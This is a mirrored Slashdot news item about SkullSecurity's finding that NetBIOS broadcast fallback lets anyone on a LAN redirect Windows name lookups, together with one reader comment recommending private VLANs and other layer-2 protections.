Slashdot Mirror

← Back to Stories (view on slashdot.org)

NetBIOS Design Allows Traffic Redirection

Posted by Soulskill on from the you-can't-get-there-from-here dept.

iago-vL writes "Security researchers at SkullSecurity have demonstrated how the NetBIOS protocol allows trivial hijacking due to its design, through the use of a tool called 'nbpoison' (in the package 'nbtool'). If a DNS lookup fails on Windows, the operating system will broadcast a NetBIOS lookup request that anybody can respond to. One vector of attack is against business workstations on an untrusted network, like a hotel; all DNS requests for internal resources can be redirected (Exchange, proxy, WPAD, etc). Other attack vectors are discussed in a related blog post. Although similar attacks exist against DHCP, ARP and many other LAN-based protocols, we all know that untrusted systems on a LAN means game over. NetBIOS poisoning is much quieter and less likely to break other things."

1 of 68 comments (clear)

  1. Layer 2 Separation by Euzechius · · Score: 5, Informative

    This attack would easily be prevented by the use of Private VLANs on your network. With PVLANs Clients connected to the LAN can only send Layer 2 frames to the default gateway and other pre-defined shared services such as printing, ad, mail, internet... Typically Private VLANs are very handy in shared/public environments such as hotels, public desktops.

    Howto configure PVLANs on a Cisco Cat 3750 switch:
    http://www.cisco.com/en/US/tech/tk389/tk814/technologies_configuration_example09186a008017acad.shtml

    Many other techniques are available to protect a L2 LAN environemnt:
    * DHCP snooping (DHCP trusted/untrusted ports)
    * Dynamic ARP inspection
    * IP Source Guard
    * Port security (stickies) and MAC acls